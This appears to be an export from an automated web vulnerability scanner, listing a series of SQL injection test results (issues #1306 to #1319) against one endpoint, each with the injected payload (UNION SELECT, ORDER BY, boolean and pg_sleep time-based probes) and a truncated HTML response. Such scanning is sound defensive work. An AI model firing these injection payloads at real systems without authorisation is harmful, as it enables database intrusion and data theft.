End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#CWE-ID CWE-89\nIssue Number #1306\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# -- -\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1307\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 15#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1308\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1309\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/Request GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1310\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1311\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ') or true--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1312\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# 1 or pg_sleep(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1313\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# and (select substring(@@version,3,1))='X'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1314Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# -1 UNION SELECT 1 INTO @,\n@\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1315\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1316\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 1=0#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1317\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nDemoUser1# 1' ORDER BY 2--+\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1318\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 26#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#CWE-ID CWE-89\nIssue Number #1319\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ' OR 1 -- -\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents 